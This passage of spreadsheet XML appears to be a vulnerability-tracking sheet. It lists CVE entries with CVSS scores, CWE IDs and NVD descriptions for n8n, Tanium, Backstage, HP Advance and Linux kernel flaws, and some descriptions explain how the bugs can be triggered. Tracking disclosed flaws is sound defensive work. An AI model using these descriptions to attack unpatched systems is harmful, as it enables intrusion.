      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.73, 2.35.4, and 2.36.2 contain a remote code execution vulnerability in the Git node. The node reset a fixed list of command-bearing configuration keys before each operation, but that list did not cover the content-filter and merge-driver key families. A repository with local configuration setting one of those keys together with a matching attribute pattern causes git to execute the configured command during an ordinary Add, Commit, Checkout, or Pull operation. The command runs as the n8n process user.</t>
        </is>
      </c>
      <c r="S207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85168</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85731</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr"/>
      <c r="Q208" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>oras-go is</t>
        </is>
      </c>
      <c r="S208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85731</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86865</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr"/>
      <c r="Q209" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Asset.</t>
        </is>
      </c>
      <c r="S209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86865</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87105</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr"/>
      <c r="Q210" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Threat Response.</t>
        </is>
      </c>
      <c r="S210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87105</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88064</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr"/>
      <c r="Q211" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-20</t>
        </is>
      </c>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>Backstage is an open framework for building developer portals. Prior to 1.14.6 and from 1.15.0 until 1.15.4, the @backstage/plugin-techdocs-node package insufficiently validates mkdocs.yml supplied by an authenticated user who can register or modify a TechDocs source. Unsafe Python YAML tags, markdown_extensions names and configuration, theme options, and extra_templates values can reach the documentation generator and cause unintended code execution. The resulting impact is limited to the files, credentials, network access, and other resources available to the TechDocs backend or build container. This issue is fixed in versions 1.14.6 and 1.15.4.</t>
        </is>
      </c>
      <c r="S211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88064</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89084</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr"/>
      <c r="Q212" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>HP
has identified potential security vulnerabilities in the HP Advance software
that may enable elevation of privilege, remote code execution, or arbitrary
file write under certain conditions, impacting the HP Advance server hosting
the software.</t>
        </is>
      </c>
      <c r="S212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89084</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89774</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr"/>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: SCO: hold sk properly in sco_conn_ready
sk deref in sco_conn_ready must be done either under conn-&gt;lock, or
holding a refcount, to avoid concurrent close. conn-&gt;sk and parent sk is
currently accessed without either, and without checking parent-&gt;sk_state:
    [Task 1]            [Task 2]
                        sco_sock_release
    sco_conn_ready
      sk = conn-&gt;sk
                          lock_sock(sk)
                            conn-&gt;sk = NULL
      lock_sock(sk)
                          release_sock(sk)
                          sco_sock_kill(sk)
       UAF on sk deref
and similarly for access to sco_get_sock_listen() return value.
Fix possible UAF by holding sk refcount in sco_conn_ready() and making
sco_get_sock_listen() increase refcount. Also recheck after lock_sock
that the socket is still valid.  Adjust conn-&gt;sk locking so it's
protected also by lock_sock() of the associated socket if any.</t>
        </is>
      </c>
      <c r="S213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89774</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89777</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr"/>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vfio/pci: clear vdev-&gt;msi_perm after freeing it on init failure
vfio_msi_cap_len() lazily allocates the per-device MSI permission table:
	vdev-&gt;msi_perm = kmalloc_obj(struct perm_bits, GFP_KERNEL_ACCOUNT);
	if (!vdev-&gt;msi_perm)
		return -ENOMEM;
	ret = init_pci_cap_msi_perm(vdev-&gt;msi_perm, len, flags);
	if (ret) {
		kfree(vdev-&gt;msi_perm);
		return ret;		/* vdev-&gt;msi_perm left dangling */
	}
When init_pci_cap_msi_perm() -&gt; alloc_perm_bits() fails with -ENOMEM, the
error path frees vdev-&gt;msi_perm but leaves the freed pointer stored in
it. vdev-&gt;msi_perm is not re-zeroed later because struct
vfio_pci_core_device is per-device and persists across open/close cycles,
and the vfio_config_init() error path returns without calling
vfio_config_free(). So the dangling pointer outlives the failed open.
That leads to two use-after-frees on the same device:
1. Reuse. The next vfio_config_init() sees the stale pointer at
   "if (vdev-&gt;msi_perm) return len;" and reuses the freed object. MSI
   config accesses in vfio_pci_config_rw_single() then dereference and
   call the freed perm-&gt;readfn / perm-&gt;writefn function pointers.
2. Double free. A later vfio_config_free() runs free_perm_bits() and
   kfree() on the already-freed object.
Fix it by NULLing vdev-&gt;msi_perm after the kfree(), matching the
NULL-after-free discipline already used in free_perm_bits() and
vfio_config_free().
  BUG: KASAN: slab-use-after-free in vfio_pci_config_rw_single (drivers/vfio/pci/vfio_pci_config.c:1961)
  Read of size 8 at addr ffff88800fcc88d0 by task exploit/143
  Call Trace:
   ...
   kasan_report (mm/kasan/report.c:595)
   vfio_pci_config_rw_single (drivers/vfio/pci/vfio_pci_config.c:1961)
   vfio_pci_config_rw (drivers/vfio/pci/vfio_pci_config.c:1986)
   vfio_pci_rw (drivers/vfio/pci/vfio_pci_core.c:1599)
   vfs_read (fs/read_write.c:572)
   __x64_sys_pread64 (fs/read_write.c:764)
   do_syscall_64 (arch/x86/entry/syscall_64.c:94)
   ...
Followed on device close by a double free of the same object:
  Oops: general protection fault, probably for non-canonical address
    0x1f63e0e8000008: 0000 [#1] SMP KASAN NOPTI
  RIP: 0010:kfree (mm/slub.c:6711)
  Call Trace:
   vfio_config_free (drivers/vfio/pci/vfio_pci_config.c:1861)
   vfio_pci_core_disable (drivers/vfio/pci/vfio_pci_core.c:685)
   vfio_pci_core_close_device (drivers/vfio/pci/vfio_pci_core.c:777)
   vfio_df_close (drivers/vfio/vfio_main.c:602)
   vfio_device_fops_release (drivers/vfio/vfio_main.c:648)
   __fput (fs/file_table.c:512)
   __x64_sys_close (fs/open.c:1496)
   do_syscall_64 (arch/x86/entry/syscall_64.c:94)
   ...
  Kernel panic - not syncing: Fatal exception</t>
        </is>
      </c>
      <c r="S214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89777</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89804</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr"/>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau/dmem: fix mismatched DMA unmap size for large folios
Device-private THP migration maps migration buffers with page_size()
and records that length in dma_info-&gt;size.  For a compound folio
page_size() is PAGE_SIZE &lt;&lt; order, but two teardown sites still pass a
literal PAGE_SIZE to dma_unmap_page():
  - nouveau_dmem_migrate_to_ram() on the success path, and
  - nouveau_dmem_migrate_copy_one() on the copy-error path.
For an order &gt; 0 folio this unmaps less than was mapped, leaking the
remainder of the IOMMU/IOVA mapping.  The other unmap sites, in
nouveau_dmem_migrate_chunk() and nouveau_dmem_evict_chunk(), already
use the saved size; use it here too.</t>
        </is>
      </c>
      <c r="S215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89804</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89811</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr"/>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdkfd: Add TLB flush after MES queue eviction/suspension
MES (Micro Engine Scheduler) does not perform heavy-weight TLB
invalidation after unmapping queues, unlike HWS which does this
automatically. This causes a race condition where in-flight DMA
descriptors can access memory that has been unmapped, leading to page
faults and GPU queue hangs during SVM page migration.
The issue manifests as KFDSVMRangeTest.MultiThreadMigrationTest
failures on gfx1151 (Strix Point) with XNACK mode 1 enabled - the GPU
compute queue hangs with packets submitted but never consumed.
Add kfd_flush_tlb() calls after MES queue removal in two locations:
- evict_process_queues_cpsch(): after all queues removed during eviction
- suspend_queues(): after debug/criu queue suspension (with mem_fence barrier)
This ensures all in-flight memory accesses from unmapped queues are
flushed before memory is freed or migrated.
(cherry picked from commit f5c4f88e0f9c45a8fb9dfac0c1df726c95e41b77)</t>
        </is>
      </c>
      <c r="S216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89811</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89844</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr"/>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Hold vport_slock for host map update in report ID acquisition
qla24xx_report_id_acquisition() format-1 handling drops vport_slock after
taking the vport reference and then calls qla_update_host_map() without
the lock. That reaches qla_update_vp_map(), which mutates the ha-&gt;host_map
btree via btree_insert32()/btree_update32()/btree_remove32() and is
documented to require vport_slock to be held by the caller. Running it
unlocked can race concurrent host_map updates and corrupt the btree.
The format-2 path in the same function already wraps its host_map update
(SET_AL_PA) in vport_slock; the format-1 path is the lone outlier.
Hold vport_slock across the format-1 qla_update_host_map() call to honor
the documented locking contract. The vref_count taken in the loop keeps
the vport valid, so this only adds the missing host_map serialization.</t>
        </is>
      </c>
      <c r="S217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89844</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89849</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr"/>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Reject non-SCSI SRB on status IOCB fast path
qla2x00_status_entry() filters out non-TYPE_SRB entries and the
SRB_NVME_CMD, SRB_BIDI_CMD and SRB_TM_CMD types, then falls through to a
SCSI fast path that assumes the command is an SRB_SCSI_CMD. The first
thing on that path, qla_chk_edif_rx_sa_delete_pending(), and the
subsequent handling both evaluate GET_CMD_SP(sp), i.e. sp-&gt;u.scmd.cmd.
The srb u union overlays the SCSI command pointer with other command
layouts (bsg_job, iocb_cmd). If firmware delivers an unexpected
STATUS_TYPE IOCB for a non-SCSI handle, sp-&gt;u.scmd.cmd can read as a
non-NULL garbage pointer, bypassing the NULL checks in
qla_chk_edif_rx_sa_delete_pending() and at the cp == NULL test, and
leading to a wild pointer dereference.
Reject any SRB whose type is not SRB_SCSI_CMD before entering the fast
path. The outstanding_cmds slot is left untouched so a genuinely
non-SCSI command still completes through its proper handler.</t>
        </is>
      </c>
      <c r="S218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89849</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89860</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr"/>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Initialize NVMe abort_work once at submission
qla_nvme_fcp_abort() and qla_nvme_ls_abort() ran INIT_WORK() on
priv-&gt;abort_work immediately before schedule_work(). INIT_WORK()
reinitializes the work_struct, resetting its list head and clearing the
pending bit. If an abort is issued more than once for the same command
(for example, concurrent transport teardown and a timeout-driven abort),
the second INIT_WORK() reinitializes a work item that is already queued,
which can corrupt the workqueue list and lead to crashes or a looping
worker.
Initialize priv-&gt;abort_work once at command submission, next to the
existing per-command spin_lock_init(&amp;priv-&gt;cmd_lock), and leave only
schedule_work() in the abort paths. schedule_work() already does nothing
when the work item is still pending, so a repeated abort no longer
disturbs an in-flight work item. The command is not returned to the
transport until the final kref_put()/release callback runs after
abort_work has completed, so the work item is idle before priv is reused
and the single submission-time INIT_WORK() is safe.</t>
        </is>
      </c>
      <c r="S219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89860</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89898</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr"/>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cec: extron-da-hd-4k-plus: add sanity check
Add check to prevent overflowing msg.msg[] in case the incoming data
is malformed.</t>
        </is>
      </c>
      <c r="S220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89898</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89907</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr"/>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Validate MSI data before routing it to EIOINTC
pch_msi_set_irq() passes e-&gt;msi.data straight into eiointc_set_irq() as
the irq number. The MSI data comes from userspace, that either via a
KVM_IRQ_ROUTING_MSI entry set with KVM_SET_GSI_ROUTING (used by irqfd
